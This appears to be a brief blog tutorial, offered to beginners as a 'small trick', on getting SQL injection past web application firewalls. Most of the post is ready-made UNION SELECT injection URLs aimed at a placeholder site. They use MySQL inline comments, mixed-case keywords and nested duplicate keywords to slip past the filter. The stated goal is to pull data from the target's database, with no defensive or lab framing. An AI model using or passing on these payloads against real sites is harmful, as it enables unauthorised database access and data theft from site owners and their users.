on bypassing web application firewall.
WAF stands for Web Application Firewall. In order to prevent the attacks such as SQLi and XSS, administrators put Web Application Firewalls. These WAFs detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable and can be easily bypassed.
How it works??
When the WAF detects malicious attempts, our input URL gives a forbidden error as shown in the following figure.
Our aim is to bypass this error and need to retrieve data from the database using some special techniques. There are many methods to bypass WAF.but right now we will discuss a small trick beginner friendly here .
Comments allow us to bypass a lot of the restrictions of Web application firewalls and to kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query.
Forbidden Sqli
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5—
By passed Sqli
http://vulnerablesite.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—
Capitalization Of Functions:-
Some WAF’s will filter only lowercase alphabets, So we can easily evade this by case changing.
Actual query
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
Replaced Keywords:-
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
Hope You like this small tutorial.
Post a Comment
Feel Free To Ask Your Query we Love To Answer